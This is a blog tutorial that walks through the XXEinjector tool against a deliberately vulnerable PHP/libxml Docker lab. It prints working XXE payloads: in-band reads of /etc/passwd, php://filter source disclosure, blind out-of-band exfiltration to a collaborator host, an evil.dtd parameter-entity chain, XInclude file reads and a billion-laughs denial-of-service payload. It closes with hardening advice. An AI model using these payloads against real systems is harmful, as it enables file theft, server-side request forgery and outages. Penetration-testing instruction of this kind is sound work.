TechEarl

XXEinjector Tutorial: Exploiting a Vulnerable App End to End

A complete XXEinjector walkthrough against a deliberately vulnerable PHP/libxml app: in-band file read, PHP filter source disclosure, blind out-of-band exfil, XInclude, and the textbook recursive-PE chain that no longer fires on libxml 2.9.14.

Ishan Karunaratne⏱️ 12 min readUpdated
Share thisCopied
End-to-end XXEinjector tutorial exploiting a vulnerable XML parser from in-band file read to blind out-of-band exfiltration

This is the walkthrough I wish I had when I first reached for XXEinjector. We start from a fresh state, point the Ruby tool at a vulnerable XML endpoint, and walk every primitive the tool exposes: in-band file read, PHP filter source disclosure, blind out-of-band exfil, plus the manual XInclude and billion-laughs payloads that sit outside XXEinjector's wheelhouse but belong in the same article. Every step is reproducible against a small Docker lab I publish for this exact purpose.

If you have not read the XML External Entity deep dive yet, do that first; this article assumes the parser flags and the entity grammar are familiar. The XXEinjector cheat sheet is the flag-by-flag reference that complements this walkthrough, and the best XXE tools list for 2026 covers where XXEinjector sits relative to manual curl and the Burp extensions.

A note on the output you will see. Every example below was produced against techearl-labs/xml-external-entity/xxe-basic on the pinned PHP 8.2 + libxml 2.9.14 image. The endpoints, parser configuration, and the failure modes are deterministic and will match what you get locally. A few outputs are environment-dependent and will differ in minor ways: the IP address the collaborator logs for the lab container (a Docker bridge address, e.g. 172.27.0.3), the exact /etc/passwd contents inside the PHP container (whatever the base image ships), XXEinjector's own log timestamps, and the path it writes the captured loot to under Logs/. Those are illustrative, the structure underneath is what to follow.

The lab target

Pull and run the lab:

bash
git clone https://github.com/ishankaru/techearl-labs.git
cd techearl-labs
docker compose up xxe-basic

The target listens on http://localhost:8086. There are two endpoints, both backed by the same unsafe parser (LIBXML_NOENT | LIBXML_DTDLOAD | LIBXML_NOCDATA, plus an explicit $dom->xinclude() call):

EndpointMethodBehaviour
/import.phpPOSTParses the XML body, echoes every <name> element back into the HTML response. In-band XXE, XInclude, and the billion-laughs mitigation all live here.
/upload-blind.phpPOSTSame parser, response hard-wired to OK or Error. No content reflects back. This is the realistic shape of a backend XML processor.

A second container, xxe-basic-collab, runs a tiny Python HTTP server on the Docker network. It has no published port (only the sibling lab container can reach it) and logs every incoming request line to stdout. Tail it in a second terminal before starting:

bash
docker compose logs -f xxe-basic-collab

That log is the side channel for every blind exfil attempt in this article. If you do not see lines appear there, the attack did not fire.

Step 1: install XXEinjector

XXEinjector is a single Ruby script. Either clone the repo or grab the file:

bash
git clone https://github.com/enjoiz/XXEinjector.git
cd XXEinjector
ruby XXEinjector.rb --help

The tool needs a recent Ruby (2.7+ is fine, anything in the 3.x range works). If --help prints, you are done. No gems, no virtualenv.

Step 2: build the request template

XXEinjector works from a captured HTTP request with an XXEINJECT marker where it should splice each payload. Save the file as req.txt:

code
POST /import.php HTTP/1.1
Host: localhost:8086
Content-Type: application/xml
Content-Length: 0

XXEINJECT

Content-Length: 0 is fine; XXEinjector recalculates it for every request before sending. The marker has to be on its own line, in the body, exactly XXEINJECT. No surrounding XML scaffolding (the tool builds that for you).

For the blind endpoint you build a second template, identical apart from the path:

code
POST /upload-blind.php HTTP/1.1
Host: localhost:8086
Content-Type: application/xml
Content-Length: 0

XXEINJECT

Save that as req-blind.txt. Both files sit next to where you run the tool.

Step 3: classic in-band file read

The in-band primitive is the one XXEinjector was originally written for: declare an external entity, reference it where the application echoes content back, and let the response do the exfil. The lab's /import.php is exactly that shape.

bash
ruby XXEinjector.rb \
  --host=127.0.0.1 \
  --file=req.txt \
  --path=/etc/passwd \
  --direct=YES \
  --verbose

What each flag does:

  • --host=127.0.0.1 is the address of the attacker's listener. We are not using the listener for this scenario (this is in-band), but XXEinjector requires the flag.
  • --file=req.txt is the request template from Step 2.
  • --path=/etc/passwd is the file on the target's filesystem to read.
  • --direct=YES tells the tool to use a direct entity reference (<!ENTITY xxe SYSTEM "file://...">) rather than the parameter-entity OOB chain (covered in Step 6, and broken on this libxml).
  • --verbose prints the payload it sends and the response it gets, which is the only way to learn how the tool reasons.

Output (abbreviated):

code
[+] Sending request with malicious XML:
<?xml version="1.0" ?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<foo>&xxe;</foo>

[+] Got response. Looking for file in response...
[+] File found:
root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
[+] Saved to: Logs/127.0.0.1/_etc_passwd

XXEinjector finds the echoed bytes in the response body, slices them out, writes them to Logs/<host>/<sanitised-path>, and prints them inline when --verbose is on. The file is on your disk now.

A useful sanity check before troubleshooting: confirm the lab echoes <name> content by hand:

bash
curl -s -X POST --data-binary @- \
  -H 'Content-Type: application/xml' \
  http://localhost:8086/import.php <<'XML'
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/hostname">]>
<bookmarks>
  <bookmark><name>&xxe;</name><url>http://x</url></bookmark>
</bookmarks>
XML

If the response contains the container's hostname inside a <strong>, the in-band primitive works and XXEinjector should succeed. If it does not, fix the manual case before re-running the tool.

Step 4: PHP filter source disclosure

file:// reads files as bytes. That is fine for plain-text files but PHP source code never reaches you intact: the engine executes it before the filesystem layer ever sees the read, so a file:///var/www/html/import.php request comes back as the rendered HTML, not the source. The classic trick is to wrap the path in php://filter/convert.base64-encode/, which routes the read through PHP's stream filter machinery and hands the parser base64 bytes instead of executed output.

XXEinjector has a built-in shortcut for exactly this:

bash
ruby XXEinjector.rb \
  --host=127.0.0.1 \
  --file=req.txt \
  --path=/var/www/html/import.php \
  --direct=YES \
  --phpfilter \
  --verbose

--phpfilter rewrites the entity URL from file:///var/www/html/import.php to php://filter/convert.base64-encode/resource=/var/www/html/import.php. The lab echoes the base64 blob back inside a <strong> tag, XXEinjector grabs it, decodes, and writes the actual PHP source.

Output (abbreviated):

code
[+] Sending request with malicious XML:
<?xml version="1.0" ?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM
  "php://filter/convert.base64-encode/resource=/var/www/html/import.php">]>
<foo>&xxe;</foo>

[+] Got response. Looking for file in response...
[+] Base64-decoded and saved to: Logs/127.0.0.1/_var_www_html_import.php

cat the file and you get the PHP source of the endpoint you just exploited. In a real engagement this is where you walk the codebase off the box looking for credentials, config files, second-order vulnerabilities, and any other entrypoints the same parser handles. The shortlist is application-specific; wp-config.php, .env, framework bootstrap files, anything in the application's config/ directory.

Step 5: blind out-of-band exfil with a direct external entity

/upload-blind.php returns OK either way, so the in-band approach above will never work there. The realistic primitive is to make libxml issue an outbound HTTP request when it resolves an entity, encode the bit you care about into the URL, and read it out of the collaborator log.

XXEinjector has a built-in HTTP listener (--oob=http) but the only port the lab container can reach is the collaborator's port 80 inside the Docker network. Easier to use what is already there:

bash
ruby XXEinjector.rb \
  --host=xxe-basic-collab \
  --file=req-blind.txt \
  --oob=http \
  --direct=YES \
  --path=/etc/hostname \
  --verbose

--host=xxe-basic-collab tells XXEinjector to point the SYSTEM URL at the collaborator hostname (which the lab container resolves over the Docker bridge). --oob=http selects the HTTP OOB mode, --direct=YES keeps the entity declaration inline rather than chaining through an external DTD.

In practice, since we are not letting XXEinjector be its own listener, the cleanest demo is to drive the payload manually with curl and watch the collaborator log. XXEinjector's value here is that the same shape generalises across hosts:

bash
curl -s -X POST --data-binary @- \
  -H 'Content-Type: application/xml' \
  http://localhost:8086/upload-blind.php <<'XML'
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY exfil SYSTEM "http://xxe-basic-collab/?leak=fired">
]>
<bookmarks>
  <bookmark><name>&exfil;</name><url>http://x</url></bookmark>
</bookmarks>
XML

Response from the lab: OK. Response in the collaborator tail:

code
[collab] GET from 172.27.0.3 path=/?leak=fired

The OOB primitive fires. The endpoint reflected nothing, but the parser still made an outbound HTTP request when it resolved &exfil;, and the collaborator received it. Anything you can put into that query string (a static token, a per-victim id, a hostname) lands in the log.

Step 6: why the textbook recursive-PE chain fails here

Every classic XXE write-up demonstrates blind file-content exfil with a recursive parameter-entity chain in an external DTD. XXEinjector implements exactly this pattern when you drop --direct=YES and let it host its own evil.dtd:

bash
ruby XXEinjector.rb \
  --host=xxe-basic-collab \
  --file=req-blind.txt \
  --oob=http \
  --path=/etc/passwd \
  --verbose

The payload XXEinjector builds is shaped like:

xml
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % remote SYSTEM "http://xxe-basic-collab/evil.dtd">
  %remote;
]>
<foo>x</foo>

evil.dtd declares a parameter entity %file that reads /etc/passwd, an %eval that defines %exfil whose SYSTEM URL embeds %file; in the query string, then forces %exfil; to resolve so the file contents leave in the outbound URL.

Against the lab's libxml 2.9.14 the chain does not fire end-to-end. What you will see in the collaborator log:

code
[collab] GET from 172.27.0.3 path=/evil.dtd

One line. The external DTD loads. The second-stage %exfil; GET that should carry the file contents never appears. libxml has tightened parameter-entity processing across the 2.9.x series and now refuses to define a new entity inside the expansion of another entity loaded from an external DTD, which is the exact mechanic the recursive-PE pattern depends on. This is current 2026 behaviour on a stock PHP 8.2 image, not a quirk of one Docker tag.

What that means for XXEinjector specifically:

  • The OOB primitive in Step 5 still works. The parser does issue outbound requests for direct external entities.
  • The recursive-PE file-content exfil that XXEinjector defaults to does not work against this parser version. You will see the initial DTD fetch and nothing else.
  • The tool has no built-in fallback. It waits, decides nothing came back, and exits without loot.

This is not a bug in XXEinjector; it is libxml hardening eroding the technique the tool was designed around. On older parsers (anything before the 2.9.11-ish window where the PE restrictions tightened), and on differently-configured parsers (Java with XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES=true and no extra hardening, .NET pre-4.5.2, Python lxml with resolve_entities=True, Go encoding/xml configured to load external DTDs), the recursive-PE chain still works exactly the way XXEinjector expects. Test the chain manually against the target before assuming the tool is broken; if the initial DTD fetch hits your collaborator and nothing else does, you are looking at the same libxml ceiling. The blind XXE OOB techniques article walks the parser-by-parser matrix.

Step 7: XInclude (no DOCTYPE, no entity declaration)

XInclude is a separate libxml feature, opt-in, and entirely independent of entity processing. The lab calls $dom->xinclude() on the parsed document, which expands <xi:include> nodes in place. XXEinjector does not generate XInclude payloads (it is an entity-focused tool), so this step is manual curl:

bash
curl -s -X POST --data-binary @- \
  -H 'Content-Type: application/xml' \
  http://localhost:8086/import.php <<'XML'
<?xml version="1.0"?>
<bookmarks xmlns:xi="http://www.w3.org/2001/XInclude">
  <bookmark>
    <name><xi:include href="file:///etc/hostname" parse="text"/></name>
    <url>http://x</url>
  </bookmark>
</bookmarks>
XML

The response includes the container's hostname inside the <strong> of the bookmark. No DOCTYPE, no <!ENTITY> declaration. The XInclude path is often missed by audits that only grep for inline DTDs, and disabling external entities does not disable XInclude. The XInclude attacks article covers the other half of the surface (recursive includes, intra-document includes that surface authentication cookies, the difference between parse="xml" and parse="text").

Step 8: billion laughs (the default mitigation in action)

The classic entity-expansion DoS, included here to show what the default libxml configuration actually catches. POST the nested payload at /import.php:

bash
curl -s -X POST --data-binary @- \
  -H 'Content-Type: application/xml' \
  http://localhost:8086/import.php <<'XML'
<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
]>
<bookmarks>
  <bookmark><name>&lol6;</name><url>http://x</url></bookmark>
</bookmarks>
XML

Response: XML parse error with a libxml diagnostic about the entity-expansion limit. Container CPU and memory stay flat. The lab demonstrates the attack and the default mitigation that already blocks it: libxml refuses to expand the document past its built-in limit. Passing LIBXML_PARSEHUGE to loadXML would disable that limit; the lab does not pass it, which is also why a real-world audit should grep for LIBXML_PARSEHUGE and LIBXML_NOENT together. The billion laughs attack article covers the variants (quadratic blowup, external-entity-based amplification) that get around expansion counters which only look at internal entity references.

Step 9: session and re-runs

XXEinjector writes everything it captures to Logs/<host>/. Re-running with the same --path overwrites the existing log entry; re-running with a different --path adds a new file. The tool has no session cache the way sqlmap does, so every run re-sends the full request, which is fine for XXE (a single round trip per file) but worth noting if you script bulk extraction across many paths.

For bulk reads, XXEinjector's --enumports and --brute=/path/to/wordlist flags loop over destinations using the same payload shape. Useful when you have one entity primitive and you want to walk a known config-file list.

What I would do next on this target

In a real engagement after Step 5 the report writes itself:

  1. Confirm in-band XXE on /import.php, multiple file-read primitives available (file://, php://filter).
  2. Confirm PHP source disclosure via php://filter/convert.base64-encode/ on every file the application user can read.
  3. Confirm blind OOB on /upload-blind.php via direct external entity (SSRF primitive: outbound HTTP from the application container to anywhere libxml can reach).
  4. Confirm XInclude on /import.php as an alternative file-read path independent of entity hardening.
  5. Note that the textbook recursive-PE file-content exfil does not fire against this parser version (libxml 2.9.14), but the OOB primitive remains.
  6. Recommend: pass LIBXML_NONET (block network resolution) and never set LIBXML_NOENT, disable XInclude (do not call $dom->xinclude()), reject any XML body containing a DOCTYPE declaration at the application layer, run the XML processor with no outbound network access from its container.

The point of this walkthrough is the chain. Each primitive on its own looks small; the cumulative chain (file read, source disclosure, outbound SSRF, XInclude as the second-path file read) is what XXE means in practice for a real audit.

Where to go next

Sources

Authoritative references this article was fact-checked against.

TagsXXEinjectorXXEXML External EntityTutorialPenetration TestingSecurityDocker

Found this useful? Pass it on.

Copied

Ishan Karunaratne

Tech Architect · Software Engineer · AI/DevOps

Tech architect and software engineer with 20+ years building software, Linux systems, and DevOps infrastructure, and lately working AI into the stack. Currently Chief Technology Officer at a healthcare tech startup, which is where most of these field notes come from.

Keep reading

Related posts

fuxploider Tutorial: Exploiting a Vulnerable App End to End

A complete fuxploider walkthrough against a deliberately vulnerable upload lab: baseline, extension bypass via .phar, lying about MIME, the double-extension trick against Apache AddHandler, a working webshell, and a Weevely pivot. Reproducible with one docker compose command.

commix Tutorial: Exploiting a Vulnerable App End to End

A complete commix walkthrough against a deliberately vulnerable lab app: identify the sink, capture the request, run the classic, time-based, and file-based techniques, pop an os-shell, catch a reverse TCP, and exploit the escapeshellcmd argument-injection gap.

LFImap Tutorial: Exploiting a Vulnerable App End to End

A complete LFImap walkthrough against a deliberately vulnerable lab app: endpoint identification, baseline scan, traversal, php://filter source disclosure, php://input RCE, and log poisoning. Every step reproducible with one docker compose command.